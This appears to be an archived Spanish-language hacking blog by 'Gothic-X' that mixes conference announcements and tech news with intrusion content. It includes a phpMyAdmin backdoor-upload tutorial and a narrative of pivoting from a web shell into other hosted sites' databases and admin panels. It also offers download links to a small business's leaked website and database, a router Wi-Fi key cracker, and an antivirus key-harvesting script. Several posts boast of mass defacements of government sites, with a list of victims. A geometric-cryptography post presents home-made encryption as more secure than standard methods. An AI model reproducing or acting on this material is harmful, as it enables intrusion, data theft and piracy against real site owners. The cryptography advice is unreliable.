UnderMx ..:: GothicX::..

Criptografia geometrica (1/4) Un Nuevo Concepto de Criptografia

2011-07-22T08:23:00.000-07:00

La criptografia geometrica es un termino que se refiere a la codificacion de cadenas con base en figuras simetricas y por lo menos con 3 vertices, asi excluimos al circulo ya que carece de estos. Incluso con este tipo de encriptacion podemos aumentar el resultado dandole dimenciones a estas figuras.
Este termino refleja una solucion alterna a la seguridad web, ya que basado en mecanismos geometricos se puede codificar y decodificar facilmente, aplicando una reversa al metodo de encriptacion.
No se puede sustituir a la codificacion popular, pero en proyectos en los que se requiere un sistema de proteccion de la informacion es util este tipo de algoritmo.
[Principios de la Criptografia geometrica]
Como venimos entendiendo, este sistema de codificacion geometrica nos aporta una solucion util y facil en la creacion de desarrollos en los que necesitamos proteger la informacion que se requiere. las figuras geometricas son la base para realizar este tipo de encriptacion. Asimismo las figuras geometricas poseen la propiedad de adquirir dimensiones, esto lo hace aun mas interesante.Para entender y crear un algoritmo con estas caracteristicas solo es necesario tener conocimiento sobre figuras geometricas.
¿Para que Sirve este tipo de encriptacion?
Esta forma de codificar, nos es util en la necesidad de ocultar informacion en una manera sencilla, rapida y segura, en un ejemplo podemos mencionar un proyecto en una pagina web, en la que requiere ocultar la informacion procesada de los usuarios, ya sea la clave de acceso y/o contraseña o llave de acceso de los usuarios. Para ello y no depender de la metodologia clasica ya que de lado del atacante este tipo de encriptacion es conocido y por ende cualquier ataque con diccionario a “X” numero de frases darian en un dado tiempo la cadena correcta codificada.
Con esta forma, esto pasa de tener este punto vulnerable a una seguridad mas estable ya que este tipo de encriptacion llega a ser personalizada y existe una probabilidad mas baja de ser rota, no podemos asegurar que esto termina con la inseguridad ya que dependiendo la capacidad del atacante y el grado de complicidad en que se elabore el algoritmo podra ser desencriptado por terceros.

Esta implementacion lo podemos recomendar a la industria privada, como al sector gubernamental para la proteccion de sus desarrollos, ya que estos pasan a ser uno de los objetivos mas atacados, esta forma pasa a ser una atraccion para los desarrolladores. Ofreciendo aparte de seguridad una moldeable situacion para adaptarse a cualquier proyecto.
En el sector gubernamental se desarrollan cualquier tipo de aplicaciones, ya sea privada o publica, estas se mantienen monitoreadas, para el objetivo de tener de manera segura el desempeño de esta. Al utilizar un algoritmo de encriptacion geometrica, podran implementar en diversas situaciones, diferentes metodos. Para asi tener un sistema mas seguro y una administracion mas sana.
–
Faltan 3 post explicando mas a fondo el funcionamiento de la criptografia geometrica.

Fuente: DSCLEON

Explotar xampp+ phpmyadmin..mas que una webshell.

2011-05-30T12:22:00.000-07:00

En el video de hoy les enseñaremos como lograr obtener un escritorio remoto basados en la vulnerabilidad de xampp+phpmyadmin.Este video consiste en aprovecharnos del phpMyAdmin que esta open y subir un backdoor en php para que ejecute comandos en el servidor y lograr cambiar el password de algún usuario o administrador del mismo..

Logrando RPD en windows from Insecure on Vimeo.

X.25 EHC

2011-01-12T11:56:00.000-08:00

El Centro de Investigaciones en Alta Tecnología organiza el Segundo

"X.25 Ethical Hacking Conferences" 2011

Se llevará a cabo del 21 al 23 de Octubre del 2011, uno de los principales eventos en Latinoamérica y primero en su tipo en México relacionado con el (Hacking Ético).

en su segunda edición se tendrán a mas personalidades del hacking mexicano mostrando nuevas vulnerabilidades y técnicas de hacking.

INSCRIPCIONES ABIERTAS

El "X.25 Ethical Hacking Conferences" permite reunir a investigadores reconocidos a nivel nacional y mundial quienes compartirán las nuevas tendencias de la seguridad informática a un nivel totalmente técnico quienes son provenientes de una gran variedad de universidades e instituciones de educación superior, organizaciones comerciales del sector público y privado e investigadores que por su propia cuenta han hecho descubrimientos en cuestión de seguridad informática se refiere.

Este evento se dividirá en dos etapas: los talleres de especialización enfocados a capacitar en las principales áreas de Seguridad Informática, y el ciclo de conferencias impartidas por reconocidos expertos que serán invitados a este magno evento para compartir sus útimas investigaciones y experiencias en el área.

FILOSOFIA:

VISION: Ser un congreso reconocido a nivel nacional que impulse y desarrolle la seguridad informática y de igual manera promueva la educación en la misma de una forma ÉTICA y PROFESIONAL.

MISIÓN: Este congreso esta comprometido a promover y fortalecer la seguridad informática en México, con el objetivo de dar a conocer la importancia que tiene forjar una cultura en cuanto a seguridad informática para asegurar un buen acceso, manejo y distribución de la información en el país

VALORES: Liderazgo - Transparencia - Ética - Profesionalismo

Hackean portal del Diario Oficial de la Federación

2010-10-27T08:17:00.000-07:00

Los hackers denunciaron ser víctimas de amenazas por parte de las procuradurías, por lo que reprochan a las autoridades los clasifiquen como delincuentes. Hasta el momento, el sitio permanece inhabilitado.

Ciudad de México.- La página web del Diario Oficial de la Federación fue hackeada esta tarde por un par de piratas cibernéticos, quienes tras aplicar un defacement –desfiguración en el diseño del portal– dejaron un mensaje contra la violencia del narcotráfico.
De acuerdo al usuario de Twitter @pateandopiedras, que logró rescatar el mensaje y la imagen, los hackers “MEXICANO INCONFORME” y “GOTHICX” habrían colocado una imagen con fondo negro y un par de manos esposadas; en la parte superior se aprecia la palabra “HACKED”, escrita con los colores nacionales; debajo de esta una fotografía que asemeja las celebraciones patrias.
En el presunto mensaje manifiestan su inconformidad por tacharlos de delincuentes, además de denunciar ser víctimas de amenazas por parte de la procuradurías “con sus juegos de violencia”.
En el texto también se reprocha a las autoridades sobre los resultados en materia de seguridad y a los medios de comunicación sobre la información que publican.
Hasta el momento, la página oficial se encuentra inhabilitada.
El mensaje íntegro dejado por los hackers sería el siguiente:
<<Otro grito mas pidiendo la seguridad, porque se empeñan en buscarnos?, que les hemos robado a ustedes que la violencia no les haya otorgado?, Actuar como MEXICANOS ahora es un delito. Se creen inteligentes?, cuando ustedes dicen que nuestro futuro es la tecnologia, Se dicen que tienen el control?, cuando nosotros sabemos controlar la tecnologia mas que ustedes, Nos llaman delincuentes?, cuando ustedes con una llamada causan dolor a personas inocentes. Nosotros tenemos la ventaja de ser LIBRES, pero contamos con la desventaja de vivir en un Mexico en el que las leyes son la manta perfecta para ocultar la suciedad, Viendo videos en los que se nos amenaza con ser localizados y detenidos, en los cuales sus Desarrolladores son los que ganan, cobrando mas por arreglar su portal informativo de internet, Que no lo ven?, Que no ven que la curiosidad es nuestro pecado, que la curiosidad es lo que nos ha traido aqui, Esa curiosidad que… HOY TE HA VENCIDO.
Estimando en porcentajes las muertes por narcotrafico, 80% a un bando, y dividen el otro tanto para los demas bandos, Que noticias recibimos diario, Un buen gobierno apoya a quien lo necesita, no a quien le conviene. Dejemos de ver a un Mexico Rojo y enfoquemonos a pintarlo de un color mas claro, que el orgullo de ser Mexicano se distinga mundialmente.
Los medios de comunicacion haciendose ricos vendiendo periodicos en los que viene el ejecutado del dia de ayer, La noticia de una Narcomanta en los puentes de varias ciudades de nuestra republica Mexicana, Las decapitacion, los altos grados gubernamentales, Informes y mas informes falsos de gobierno, Transparencia para el que ya no tiene con que cubrirse, pero al que ya esta mas abrigado le dan su playera de seda…
Si uno cae, caemos todos, Si uno se levanta, LEVANTAMOS A MEXICO.
Pactos, asambleas, camaras, tribunales, reuniones exteriores, VIOLENCIA, FRAUDE, ASESINATO, CARTELES. <— Que piensas al leer eso?, En MEXICO!, en nuestro Mexico actual.
Ahora la protesta se deriva a costa de las amenazas dictaminadas con caracter de federal de las procuradurias en las cuales se nos tacha de delincuentes asustandonos con sus juegos de violencia.>>

¿Se te olvido el password de tu ubuntu?

2010-10-05T09:20:00.000-07:00

Cambiando el password de sesion de ubuntu:

1.- primero arrancamos la pc/lap con tu live cd de ubuntu.
2.- entramos a la unidad hard disk desde el live y buscamos el archivo
shadow en mi caso seria como la imagen:

La imagen ha sido reducida un 56% de su tamaño original (600x339). Click en esta barra para ver la imagen original de (1360x768). Click en la imagen para abrirla en una nueva ventana.

3.- ahora abriremos una terminal y nos loguearemos como root:

La imagen ha sido reducida un 10% de su tamaño original (600x422). Click en esta barra para ver la imagen original de (660x464). Click en la imagen para abrirla en una nueva ventana.

4.- ahora copiamos la direccion del archivo shadow que seria algo como
/media/34525656543-343452356/etc/shadow ( ejemplo )
5.- nos saldra algo como esto:

La imagen ha sido reducida un 10% de su tamaño original (600x426). Click en esta barra para ver la imagen original de (662x470). Click en la imagen para abrirla en una nueva ventana.

6.- buscamos y editamos el password de nuestro usuario, en mi caso pcfixit:

La imagen ha sido reducida un 43% de su tamaño original (600x307). Click en esta barra para ver la imagen original de (1050x537). Click en la imagen para abrirla en una nueva ventana.

ponemos la siguente hash:

Cita:$6$m7S4lh3M$3LGPHyZeb7ci6H/TTgSOYHoumX2kOF211wKLndJ4pPdZyCsB/Ay6fQj5kn/9Sj2wemK9OjXdjR9iCaxHJqfd7.

que significa: administracion
7. reiniciamos la pc/lap sin el live cd y nos logueamos con nuestro nuevo password (: .

By: Gothic-X

Ciber Protesta Mexicana :: 16 de Sep 2010

2010-09-06T07:59:00.000-07:00

Les escribo a los inconformes con las dictaduras del gobierno, importantes Team's y sobresalientes apasionados de la de seguridad informática para que se vayan apuntando aqui mismo con un comentario a esta causa que tenemos en comun, que es el hacernos escuchar por el medio que nosotros podemos ser escuchados... la inet!!

Aqui mismo ire poniendo los nicks de quienes se integren a esta causa:

Zer0 z0orG
0o_zeus_o0
Gothic-X
KlanX
n3s0k

Nod32 keys

2010-08-30T10:17:00.000-07:00

Bue aqui les dejo unos codes para sacar keys nod32:
code by Syndr0me el code original tiene una url diferente ya le puse el dominio nuevo y ya esta funcional ^^
aqui les dejo la url : http://www.pcfixit.com.mx/nod32.php

Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web

2010-07-15T09:05:00.000-07:00

ACTUALIZADO: acaba de salir la versión 0.8 de esta excelente herramienta para realizarpentest hacia aplicaciones web, todas las herramientas han sido actualizadas y algunos errores corregidos.

Descarga esta nueva versión haciendo click en este enlace… si no sabes que es Samurai Web Testing Framweork, te digo que…

Samurai Web Testing Framework es un entorno de trabajo basado en GNU/Linux Ubuntu, que ha sido pre-configurado para llevar a cabo test de penetración a aplicativos Web.

Este LiveCD, que además puede ser instalado como sistema operativo por defecto en el disco duro, contiene un repertorio bastante amplio en cuanto a herramientas de libre uso y distribución se refiere. Estas herramientas están destinadas a realizar pen-testing sobre aplicativos Webs.

Al igual que la distribución BackTrack, Samurai Web Testing Framework divide las herramientas por grupos según una metodología.

Comienza por la etapa de reconocimiento, para ello hace uso de las herramientas Fierce domain Scanner y Maltego. Para el mapeo del sistema objetivo incluye la herramientaWebScarab y Ratproxy. Para el descubrimiento de vulnerabilidades incluye w3af y burp, finalmente para el proceso de explotación utiliza BeEF, AJAXShell y otras más.

Como si esto fuera poco, Samurai Framework incluye una wiki preconfigurada y lista para ser usada como bitácora de recolección de la información que vamos generando a medida que avanzamos en el proceso de pen-testing.

Los desarrolladores hacen anuncio oficial de la disponibilidad de esta primera distribución como versión de desarrollo y hacen la invitación a los interesados a participar de este genial proyecto, ofrecen para ello un sitio Web y una lista de correo.

Para finalizar dejo algunas capturas de pantalla de lo que he probado a manera “superficial” sin entrar aún mucho en el detalle de uso y comportamiento del sistema (hasta el momento va muy bien). Quiero además hacer la salvedad que estas mismas herramientas pueden ser instaladas y configuradas en diferentes S.O, por lo tanto una vez más queda comprobado que no importa el S.O que utilicemos, todos pueden servir para las diferentes tareas de nuestro día a día, incluso para estos menesteres de la seguridad

Booteo de Samurai Web Testing Framework

Cargando y reconociendo componentes y hardware

Inicio de sesión (contraseña para root)

Escritorio (Gnome)

Menú Samurai (Herramientas)

Navegador (Add-ons incluídos: Edit cookies, DOM Inspector, Firebug, Greasemonkey, HackBar, Header Spy, SQL Injection, etc)

Herramienta WebScarab

Terminal

Wiki incluida y pre-configurada

Ejecución del instalador a disco duro

Mas Información:
Web oficial del Proyecto Samurai Web Testing Framework
Descargar Samurai Web Testing Framework

Fuente: DragonJar.org

script www.sexshop.pl

2010-06-25T22:31:00.000-07:00

Bueno buscando webs vulnerables me encontre www.sexshop.pl como veran es una web polaca que vende productos erotics, aqui les dejo unas imagenes, de su index.html su index.php

Links de descarga: website

Link de descarga: database

Facebook smileys

2010-06-25T14:12:00.000-07:00

Aquí les dejo los caracteres para los smileys para el chat del facebook :p

clic en la imagen para ver mas grande

Hacking Wireless Modems thompson - Speedtouch

2010-06-22T21:05:00.000-07:00

Este programa fue disenado principalmente para auditorias wireless en su

propio router thompson - speedtouch.

Compatible en Windows XP, Windows Vista y 7...

Instrucciones de uso...

Escribe el SSID de la Red Infinitum y presiona enter y listo...

En breve se generaran las claves posibles para el Roter Thompson - Speedtouch

Ejemplo... Si la red se llama INFINITUM83F290 solo escribe "83F290"

y presiona enter...

NOTA: solo funciona cuando hay 6 digitos despues del subfijo INFINITUM

En lo personal lo eh usado unas 6 veces las cuales ah acertado 5 de ellas. aqui el link de descarga.

http://www.pcfixit.com.mx/HackInfinitum.exe

nota: si piensan que es para infectar. ni lo descarguen y listo. 100% libre de virus.

CDmon y Google app email.

2010-05-19T08:41:00.000-07:00

Bueno aqui escribiendo de nuevo despus de un rato, les traigo la configuracion que hay que poner en CDMON para que funcionen los correos con google app. Seria buen completento para el tutorial de servidor web casero bajo ubuntu server. espero les sirva.

#
Registro MX (ASPMX.L.GOOGLE.COM - 1)
#
* Registro MX (ASPMX2.GOOGLEMAIL.COM - 10)
#
* Registro MX (ASPMX3.GOOGLEMAIL.COM - 10)
#
* Registro MX (ASPMX4.GOOGLEMAIL.COM - 10)
#
* Registro MX (ASPMX5.GOOGLEMAIL.COM - 10)
#
* Registro MX (ALT1.ASPMX.L.GOOGLE.COM - 5)
#
* Registro MX (ALT2.ASPMX.L.GOOGLE.COM - 5)

y aqui una imagen de como se ve..

nota: tapo dominio por seguridad propia.

Steve Jobs contra la tecnología Flash

2010-04-30T07:57:00.000-07:00

El directivo de Apple ha explicado en una carta por qué la compañía se niega a incluir Flash en sus dispositivos.
Adobe ha respondido a los duros comentarios de Jobs.

####################################################################

Recientemente Adobe decidió dejar de invertir en desarrollo de software para los dispositivos de Apple, ante la continua negativa de permitir Flash en sus dispositivos. Era la última gran bomba lanzada en esta sonada guerra y, quizá por ello, Steve Jobs haya decidido tomar cartas en el asunto.

Hace años, Apple y Adobe trabajaron conjuntamente. De hecho, la de la manzana invirtió en Adobe y llegó a poseer el 20% de la compañía. Ahora las cosas han cambiado mucho: ni iPhone, ni iPod Touch ni iPad permiten la reproducción de Flash. Una decisión que destapa críticas constantes y no sólo en Adobe.

Adobe asegura que somos un sistema cerrado y que Flash es abierto, pero de hecho lo contrario es la verdad

Steve Jobs ha decidido publicar una carta abierta con la que pretende que los "clientes y críticos entiendan mejor" por qué no permiten Flash en sus dispositivos. "Adobe asegura que somos un sistema cerrado y que Flash es abierto, pero de hecho lo contrario es la verdad", asegura Jobs en su misiva, ya que "aunque los productos Flash de Adobe son fácilmente accesibles, eso no significa que sean abiertos, ya que son controlados íntegramente por Adobe y disponibles sólo desde Adobe".

En este sentido, el directivo reconoce que Apple "tiene muchos productos propietarios también" -como el iPhone SO-, si bien consideran que "todos los estándares relativos a la web deberían ser abiertos".

En lugar de usar Flash, Apple ha adoptado HTML5, CSS y JavaScript, todos estandars abiertos. "Todos los dispositivos portátiles de Apple ofrecen un gran rendimiento, potencia baja y estos estándares abiertos", indica Jobs. "HTML5 ha sido adoptado por Apple, Google y muchos otros, permitiendo a los desarrolladores web crear gráficos avanzados, tipografía, animaciones y transiciones sin necesitar un 'plugin' de una 'third party'".

Durante su argumentación, Jobs esgrime motivos de "confiabilidad, seguridad y desempeño", además del hecho de que Flash está diseñado "para ordenadores personales que usan ratones y no para pantallas táctiles que usan los dedos". "Y las 200.000 aplicaciones en App Store, de Apple, demuestran que Flash no es necesario para que decenas de miles de programadores desarrollen aplicaciones gráficamente ricas, incluso juegos", agregó.

La respuesta de Adobe

El CEO de Adobe, Shantanu Narayen, ha respondido a lo que considera un "extraordinario ataque". En una entrevista al World Street Journal, Narayen dijo que la diferencia es que Adobe sí cree en el contenido abierto. Según él, su 'software' se diseñó para trabajar en múltiples dispositivos y "el comportamiento reciente de Apple demuestra que están preocupados" porque Adobe es capaz de ofrecer este producto que funciona en múltiples plataformas.

Las restricciones de Apple hacen que el trabajo de los desarrolladores se convierta en pesado y torpe

El directivo consideró que las restricciones de Apple hacen que el trabajo de los desarrolladores se convierta en "pesado y torpe" si quieren hacer productos para varios dispositivos. Considera que deben llevar dos ritmos de trabajo, uno para los dispositivos de Apple y uno más para los otros.

Sobre que la acusación que hace Jobs de que Flash es el causante de la mayoría de las veces que un Mac se bloquea, el directivo de Adobe consideró que no se trata de un problema provocado por su 'software' sino de "algo relacionado con el sistema operativo de Apple". En cuanto a las acusaciones sobre el consumo acelerado de batería que supuestamente produce el uso de Flash, Narayen aseguró que son "patentemente falsas".

De forma general, el CEP de Adobe consideró que "cada una de estas acusaciones hay un interés propietario" por parte de Apple, que impide a Adobe innovar.

Maneras de llegar a un objetivo.

2010-04-21T19:27:00.001-07:00

Bueno esto es un caso curioso que me ah tocado, logico entras a una web por medio de SQLi o equiz ataque, subes tu web-shell y vuala ya tienes acceso al host pero ah, vez que tiene algo como esto /var/www/vhosts/dominio.com amm deduces que puede haver mas de un dominio alojado en ese sevidor, que es lo primero que haces? bueno en mi caso intentar rootear el servidor pero sorpesa o esta fixeado o esta demaciado actualizado el kernel, bueno umm 2da opcion bypassear por directorio, puede ser que saquemos el etc/passwd para ver como esta formado los directorios para intntar navegar, bue que no carga el etc/passwd chin, bueno umm la siguiente opcion hagamos un reverce DNS para ver que dominios tenemos en el servidor
www.cascanolahack.com
hslteam.com
remoteexecution.org
elhacker.net
securitybroken.com
taringa.net
en fin los que salgan y vemos como esta el directorio de los vhost en nuestro caso de la siguiente manera /var/www/vhosts/dominio.com entonces aaaaa( se te prende el foco ) cambiemos nada mas el dominio =D , logramos bypassear a elhacker, a hslteam, pero nosotro tenemos como meta a cascanolahack y como esta tan 1337 que no tiene permiso de lectura y por lo tanto escritura. y demonios >.< ahora quien podra salvarnos D:, llega la maravillosa idea de revisar las db de la web por la que entraste y te das cuenta de que se visualizan las demas db de todos los dominios alojados =D, solo queda buscar la db de cascanolahack, ver tabla y columnda deseada, sacar los datos deseados, en caso de que este encryptada pues logico desencryptarlo, correr a la web a buscar panel de admin y listo entramos.
ahora nada mas queda dejar un mensajito tipo

Facebook Phishing..

2010-03-21T10:43:00.000-07:00

Es sorprendente como una empresa como facebook se preste a este tipo de cosas, aun que era de esperarce de parte de los phishers de ver como obtener cada dia mas, pero este metodo ya es algo molesto por los banners a los costados y asi.
bueno estaba viendo unas fotos de una amiga y me llamo la atencion una publicidad que decia Recarga en linea telcel.

y al darle clic era de esperarce un lindo scam afortunadamente ya reportado en FF pero en IE sigue vivo.

en fin cuidado con lo que abren en facebook...

"X.25 Ethical Hacking Conferences"

2010-03-20T16:26:00.000-07:00

"X.25 Ethical Hacking Conferences"

Uno de los principales eventos en Latinoamérica relacionado con la seguridad informática.

El "X.25 Ethical Hacking Conferences" permitirá reunir a investigadores reconocidos a nivel nacional y mundial quienes compartirán las nuevas tendencias de la seguridad informática a un nivel totalmente técnico quienes son provenientes de una gran variedad de universidades e instituciones de educación superior, organizaciones comerciales del sector público y privado e investigadores que por su propia cuenta han hecho descubrimientos en cuestión de seguridad informática se refiere.

Este evento se dividirá en dos etapas: los talleres de Especialización enfocados a capacitar en las principales áreas de Seguridad Informática, y el ciclo de Conferencias impartidas por reconocidos expertos que serán invitados a este magno evento para compartir sus últimas investigaciones y experiencias en el área.

Las Conferencias y los talleres de Seguridad Informática se llevarán a cabo del

23 y 24 de Octubre del 2010

Sede: Xalapa, Ver. México

SISCTI 35

2010-02-10T10:30:00.000-08:00

¿Quiénes Somos?

El Simposium Internacional de Sistemas Computacionales y Tecnologías de Información: SISCTI es un evento organizado 100% por estudiantes profesionistas de las diferentes carreras de Tecnologías de Información del ITESM, Campus Monterrey.

Año con año, desde 1974 cuando el Tecnológico de Monterrey abrió por primera vez en Latinoamérica la carrera profesional en Ingeniería en Sistemas Computacionales, el comité organizado se ha esforzado por brindar un evento de calidad a todos sus asistentes.

SISCTI es reconocido por ser en Latinoamérica el evento más grande de Tecnologías de Información organizado por estudiantes, pues a lo largo de sus diferentes ediciones ha contado con la presencia de conferencistas como: Steve Wozniak (Co fundador de Apple), Jon Hall (Linux), David Pogue (New York Times), Dr. Kevin Warwick (Project Cyborg), Larry Sanger (Wikipedia), Marco Marinucci (Google), Ada Dotzler (Firefox), entre otros.

Conferencias

Foto de ITESM

Blanca Treviño

Softtek

27 de Febrero de 2010

Auditorio Luis Elizondo

http://www.softtek.com/mexico/

Foto de Business Week

David Ulevitch

OpenDNS

25 de Febrero de 2010

Auditorio Luis Elizondo

http://www.opendns.com/about/david/

Foto de Cornell University

Hod Lipson

Cornell University

26 de Febrero de 2010

Auditorio Luis Elizondo

http://www.mae.cornell.edu/Lipson/

Foto de obscuranet

Howard Charney

Cisco

25 de Febrero de 2010

Auditorio Luis Elizondo

http://www.cisco.com/

Foto de Ana Morín

Hugo Santana

IBM

26 de Febrero de 2010

Auditorio Luis Elizondo

http://www.ibm.com/mx/ibm/hs/

Foto de thekenyeung

Kara Swisher

The Wall Street Journal

26 de Febrero de 2010

Auditorio Luis Elizondo

http://www.wsj.com/

Foto de The Tech Herald

Karsten Nohl

University of Virginia

27 de Febrero de 2010

Auditorio Luis Elizondo

http://www.cs.virginia.edu/~kn5f/

Foto de CIOL

Subu Goparaju

Infosys

25 de Febrero de 2010

Auditorio Luis Elizondo

http://www.infosys.com/about/management-profiles/Pages/subrahmanyam-goparaju.aspx

video Promocional:

pasos para aprender a bailar duranguense

2010-02-01T12:26:00.001-08:00

jajajaj rlz mi carnal xD

Reclaman a gobierno a través de protesta en la red

2010-01-25T11:50:00.001-08:00

Aca dejo una de las tantas notas que dieron sobre la CPM
Esta nota viene de El universal---Alejandro Leon aka Gothic-X
-------------------------------------------------

¡Viva México Cabrones!, esta es la leyenda que se puede leer escrita sobre una imagen de la bandera mexicana en varios portales de algunas páginas oficiales de varios gobiernos estatales, dependencias y organizaciones. La protesta se la adjudica el grupo autonombrado como Ciber Protesta Mexicana (CPM).

"En un país en el que nuestros gobernantes, diputados y senadores piensan que somos ciegos, que somos sordos, que somos mudos, que esperamos pacientes con miedo, sin voluntad ni protesta alguna nosotros Mexicanos levantamos esta protesta cibernética pacifica y decimos... Si vemos! Si escuchamos! Si hablamos, Si pensamos, Hablamos y Actuamos... Escribimos...", de esta manera la CPM escribe para convocar a la población a participar en esa ciberprotesta

En los mensajes que se leen en las páginas hackeadas, el grupo se manifiesta en contra de Telmex, Comisión Federal de Electricidad, Pemex, los líderes sindicales, la corrupción entre los policías y servidores públicos entre otros temas: "Corrupción, Nepotismo, Abuso de Autoridad, Ineptitud, trafico de influencias, abuso de poder, Compadrísimo [...] etc"

En un último mensaje los hackers invitan a la cibernautas a dejar su "propuesta ciudadana"

"Esta protesta es del pueblo mexicano, no pensamos en dar nuestra opinión sin dejar a este mismo... el pueblo hacerlo, ya que parecen ser nuestros gobernantes los que no nos escuchan."

Después de este mensaje aparecen 347 comentarios, entre los que se leen reclamos subidos de tono, propuestas y críticas

Algunos de los portales que la CPM hackeó fueron las del gobierno de Colima, Tuxtla, Michoacán; el Sistema de Observación por la Seguridad Ciudadana, la Coordinadora Nacional de las Fundaciones Produce, El Diario de Chihuahua, la Secretaría de Desarrollo Rural de Puebla, Liconsa

Además de: www.palenqueonline.com/, www.casadelarchivo.gob.mx/, www.laboratoriosjulio.com.mx/, www.eldiariodedelicias.com.mx/, www.plataformafinancierajz.com/, ligadeunidadsocialista.org/, www.spm.org.mx/, convermex.com.mx/, www.parggon.com.mx/, www.colegiocervantesprimaria.edu.mx/, www.monitorapcj.com/, www.lapuertanoticias.com

Y aca otra nota de Eterblog

Hackean sitios Mexicanos (Hack Masivo e Interactivo)

Hace unos minutos me informaron por messenger acerca del hack masivo que se realizo sobre paginas Web Mexicanas entre los sitios que destacan aparecen páginas de Gobierno, Noticieros así como particulares.

El ataque firmado como: HACKED BY [CPM]Ciber Protesta Mexicana Consiste en un mismo “Owned” en todas las páginas con los siguientes textos eh imágenes.
HACKED BY [CPM]Ciber Protesta Mexicana

Miembros de la [CPM]:
Zer0 z0orG, 0o_ZeuS_o0, n350k, CrasherOx!, Gothic-X, KaSooR, Tunich
y beso ala mujer que adoro [ MD ]

Momentos difíciles..

En un país en el que nuestros gobernantes, diputados y senadores piensan que somos ciegos, que somos sordos, que somos mudos, que esperamos pacientes con miedo, sin voluntad ni protesta alguna nosotros Mexicanos levantamos esta protesta cibernética pacifica y decimos…

Si vemos! Si escuchamos! Si hablamos, Si pensamos, Hablamos y Actuamos… Escribimos…

… ¡No! más

Corrupción, Nepotismo, Abuso de Autoridad, Ineptitud, trafico de influencias, abuso de poder, Compadrísimo,
Malversación de fondos, Descaro, Mentiras, Robos, Enriquecimiento ilícito, Favoritismos, Hipocresía, Partidos políticos inútiles, Asesinatos, Sobornos, Pobreza , Lavado de dinero, Engaño,
Narcotráfico, Ignorancia, Manipulación, Injusticia, Cinismo, Violencia, Secuestros Etc,etc,etc.

No Queremos un país donde:

* Dónde la telefonía es controlada y monopolizada por una sola persona, recordemos que TELMEX era de los mexicanos y ahora es de uno solo, el más rico del mundo.
* Dónde los funcionarios y servidores públicos tienen nexos con la mafia
* Dónde los líderes sindicales hacen lo que mejor les conviene y pretender controlar al gobierno con manifestaciones y paros laborales
* Dónde las empresas públicas como CFE y PEMEX se manejan como empresas familiares
* Dónde la policía es corrupta, ineficiente y sin preparación

Queremos un país donde:

propuesta ciudadana

Esta protesta es del pueblo mexicano, no pensamos en dar nuestra opinión sin dejar a este mismo… el pueblo hacerlo, ya que parecen ser nuestros gobernantes los que no nos escuchan.

Seguido por algo que me parece muy interesante y que yo he llamado “El Hack Interactivo” ya que nos permiten a cualquier usuario dejar un comentario o propuesta la cual se a diere a la página hackeada.

Y finalizando con:

GRETS:
– ARGENTINIAN JUACKERS –
Cereal, knet, kikoarg, ricota, 3ktorce, f0urtruder, MurdeR, pony-magic, l0gin-root, panther-root, Deyabu r00lz, Emetrix, The Venom,
EliNet, Ak3r, InyeXion, Xarnuz, p0ison-r00t, thanatos.

– Latinoamerican Juankers –
y saludos pá el Komtec1/2.0,Pandrax, Bikolinux, Benox, ErTeK, wer0x, bucio, N4ib4f, JAmmz, her0, Boer, 0×0c, nett0xic, pr0t0s, xianur0, Xtremo31,
Harakiri, mbyte, lastdragon, anarkill, h4t3 m3, phyro, v0ltran y toda la banda

| InformaticaxD | SecurityBroken | Nesok | Mteam | #RE | HSLTeam |

&& para TODOS los que nos conocen =]

Lista de páginas hackeadas:

http://www.mexicosos.com.mx/

http://www.cofupro.org.mx

http://www.palenqueonline.com/

http://www.colima.gob.mx/

http://www.tuxtla.gob.mx/

http://www.casadelarchivo.gob.mx/

http://www.spm.org.mx/

http://convermex.com.mx/

http://www.laboratoriosjulio.com.mx/

http://www.parggon.com.mx/

http://www.colegiocervantesprimaria.edu.mx/

http://www.monitorapcj.com/

http://eldiariodechihuahua.com.mx/

http://www.arrobajuarez.com

http://www.lapuertanoticias.com

http://www.almargen.com.mx/

http://www.eldiariodedelicias.com.mx/

http://plataformafinancierajz.com/

http://www.regionlibre.com

http://flymissions.com/

http://www.hallofmetal.com/

http://www.sdr.gob.mx/

http://www.gruposaveres.com/

http://www.colorescreativos.com.mx/

http://www.lasarenasclub.org/

http://www.liconsa.gob.mx/

http://agendapublica.org/

http://www.panhgo.org.mx/

http://www.michoacan.gob.mx/

http://www.h24.com.mx/

http://juanmanuelpresidente2009.com/

http://ligadeunidadsocialista.org/

http://pulidodipan.org.mx/

Aca un PDF en la revista Proceso

Aun se puede ingresar al sitio, al cual se redirigia en la ciber protesta:
http://informaticaxd.com.ar/prot/index.php

Mini-manual de *.htaccess

2010-01-25T11:49:00.000-08:00

[ Benox.diosdelared.com - Malandrines.net ]
-= Benox - MTEAM =-
1 9 9 9 - 2 0 1 0

------------------------------
[+] Htaccess:
[-] Introducción
______________________________
[+] Ejemplos:
[+] Bloquear carpetas +bonus.
[+] Listar directorio.
[+] Error HTTP 404 personalizadas.
[+] Bloqueo de referers maliciosos.
[+] Bloquear robots.
[+] Cambiar extencion de archivos.
______________________________
[+] Más información.
[+] Greets.
------------------------------

=> Introducción:
Este mini-manual de *.htaccess. Esta creado para explicar un poco el

funcionamiento del mismo. Y lo util que podria llegar ah hacer en varios casos.
solo tocare algunos puntos basicos.

Como siempre dejare citada un poco de informacion sobre *.htaccess segun wikipedia:

En varios servidores web (Apache con más frecuencia). *.Htaccess (acceso de hipertexto) es

el archivo de configuración del servidor web. El archivo. Htaccess se coloca dentro del

árbol web, y es capaz de anular una parte de la configuración global del servidor, el

alcance de este subconjunto es definido por el administrador del servidor web. [1] El

propósito original de. Htaccess es permitir control de acceso a directorios web (por

ejemplo, exigir una contraseña para acceder a los contenidos). Hoy en día. Htaccess puede

anular muchas otras opciones de configuración, en su mayoría relacionados con el control de

contenidos, por ejemplo, tipo de contenido y el conjunto de caracteres, los controladores

de CGI, etc.

-----------------------------

=> Bloquear carpeta +Bonus :

#deny all access
deny from all

- ¿Para que nos sirve?, sencillo. Sirve para bloquear acceso a directorios.

#deny all access
deny from all
allow from 198.0.0.1

- Acceso por direccion ip.

Order allow,deny
Deny from all

- Bloquear archivo especifico.

-----------------------------

=> Navegar por directorios :

Para poder navegar por directorios basta con crearnos un archivos *.Htaccess de la

siguiente manera.

Options +Indexes +MultiViews +FollowSymlinks

- ¿Que hace?, lista los archivos en un directorio. Y los deja visibles.

IndexIgnore *

- Evitar un listado de carpetas.

-----------------------------

=> Error HTTP 404 personalizadas :

Si se decea enviar a nuestro visitantes a otra pagina en caso de topar con un

error404, se podria hacer de la siguiente manera:

ErrorDocument 404 /PATH/TUPAGINA.HTML

